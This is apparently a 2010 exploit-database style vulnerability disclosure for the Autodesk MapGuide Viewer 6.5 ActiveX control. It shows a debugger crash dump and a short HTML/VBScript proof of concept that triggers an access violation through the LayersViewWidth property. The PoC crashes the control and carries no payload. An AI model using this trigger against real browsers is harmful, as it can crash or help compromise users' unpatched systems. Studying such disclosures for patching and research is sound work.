# Exploit Title: Autodesk MapGuide Viewer ActiveX(MGAXCTRL.DLL)Overflow Vulnerability
# Date: [01-09-2010]
# Author: [d3b4g]
# Software Link: http://usa.autodesk.com/adsk/servlet/item?siteID=123112&id=9454821
# Version: [6.5]
# Tested on: [Winxp SP3]
# regards to ROL guys
Exception Code: ACCESS_VIOLATION
Disasm: 175CE9E CMP DWORD PTR [ESI+1C],0 (MGAXCTRL.DLL)
Seh Chain:
--------------------------------------------------
1 192847C MGAXCTRL.DLL
2 73352542 VBSCRIPT.dll
3 7C839AD8 KERNEL32.dll
Registers:
--------------------------------------------------
EIP 0175CE9E
EAX 00000001
EBX 003EB690 -> 0193F684
ECX 00000000
EDX 003E0608 -> 00180F98
EDI 003EB5D8 -> 0193FC24
ESI 00000404
EBP 0013EA84 -> 0013EAA0
ESP 0013EA58 -> 003EB644
ArgDump:
--------------------------------------------------
EBP+8 003EB644 -> 0193F90C
EBP+12 00000000
EBP+16 0013EAD4 -> 00130000
EBP+20 0042C4F4 -> 00110024
EBP+24 0013EA94 -> 0013EAD4
EBP+28 0013EB30 -> 0013EBC0
Block Disassembly:
--------------------------------------------------
175CE8F POP ESI
175CE90 JMP [EAX+60]
175CE93 PUSH ESI
175CE94 LEA ESI,[ECX+404]
175CE9A TEST ESI,ESI
175CE9C JE SHORT 0175CEC2
175CE9E CMP DWORD PTR [ESI+1C],0 <--- CRASH
175CEA2 JE SHORT 0175CEC2
175CEA4 PUSH 0
175CEA6 PUSH DWORD PTR [ESP+C]
175CEAA MOV ECX,ESI
175CEAC PUSH 0
175CEAE CALL 01912C63
175CEB3 MOV EAX,[ESI]
175CEB5 MOV ECX,ESI
PoC:
<object classid='clsid:62789780-B744-11D0-986B-00609731A21D' id='target' />
<script language='vbscript'>
'File Generated by COMRaider v0.0.133 - http://labs.idefense.com
'Wscript.echo typename(target)
'for debugging/custom prolog
targetFile = "C:\Program Files\Autodesk\MapGuideViewerActiveX6.5\MgAxCtrl.dll"
prototype = "Property Let LayersViewWidth As Long"
memberName = "LayersViewWidth"
progid = "MGMapControl.MGMap"
argCount = 1
arg1=0
target.LayersViewWidth = arg1
</script>
